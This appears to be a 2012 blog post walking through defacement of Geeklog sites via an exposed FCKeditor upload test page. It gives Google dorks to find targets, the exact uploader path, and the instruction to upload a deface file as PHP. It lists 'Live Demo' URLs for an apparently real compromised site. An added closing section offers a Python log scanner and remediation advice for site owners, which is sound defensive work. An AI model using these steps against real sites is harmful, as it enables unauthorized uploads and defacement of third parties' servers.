Monday, 27 August 2012

Geeklog Remote Deface Upload Vulnerability

Geeklog Remote Deface Upload Vulnerability: this vulnerability is similar to the WordPress FCKeditor upload vulnerability (read about the WordPress FCKeditor upload vulnerability); in Geeklog only the path is different.


Let's start.
Open google.com and enter this dork:
inurl:"/geeklog/" 
or 
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html


Now go to the site, site.com/geeklog/
Now put the URL /Geeklog/fckeditor/editor/filemanager/upload/test.html after the .com, .net or other site domain.
The URL will now be:
site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

Now select php under
Select the "File Uploader" to use:

Now upload your deface :)

Live Demo
http://www.sightline4bd.com/geeklog/
http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html
http://sightline4bd.com/geeklog/images/libraryHack.htm
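
For site owners: the requests described above leave a clear trace in web server access logs. The following is an added example, not part of the original post, that scans combined-format log lines for access to the FCKeditor upload directory named above and flags clients whose POST was accepted. The log lines, IP addresses and the handler filename in the sample are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Directory named in the post; compared lower-cased (post uses /geeklog/ and /Geeklog/).
UPLOAD_DIR = "/fckeditor/editor/filemanager/upload/"
# Common/combined log format: ip - user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (ip, kind, status, path) for a hit on the upload directory, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Percent-decode and lower-case so %2F or mixed-case variants still match.
    path = unquote(urlsplit(m["target"]).path).lower()
    if UPLOAD_DIR not in path:
        return None
    if m["method"] == "POST":
        kind = "upload-attempt"
    elif path.endswith("/test.html"):
        kind = "test-page-probe"
    else:
        kind = "other-access"
    return m["ip"], kind, int(m["status"]), path

def summarize(lines):
    """Group hits per client IP and flag clients whose POST got a 2xx response."""
    report = defaultdict(lambda: {"kinds": [], "post_accepted": False})
    for line in lines:
        hit = classify(line)
        if hit:
            ip, kind, status, _ = hit
            report[ip]["kinds"].append(kind)
            if kind == "upload-attempt" and 200 <= status < 300:
                report[ip]["post_accepted"] = True
    return dict(report)

# Constructed sample lines (documentation IP ranges; handler filename is an assumption).
SAMPLE = [
    '203.0.113.7 - - [27/Aug/2012:10:00:01 +0000] "GET /Geeklog/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2048',
    '203.0.113.7 - - [27/Aug/2012:10:00:09 +0000] "POST /Geeklog/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 312',
    '198.51.100.20 - - [27/Aug/2012:10:05:00 +0000] "GET /geeklog/fckeditor/editor/filemanager/upload%2Ftest.html HTTP/1.1" 404 210',
    '192.0.2.5 - - [27/Aug/2012:10:06:00 +0000] "GET /geeklog/index.php HTTP/1.1" 200 5120',
]
```

A client with `post_accepted` set warrants a review of recently created files under the web root. Removing the test page, or denying web access to the upload directory where the editor's uploader is not needed, takes away the entry point.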
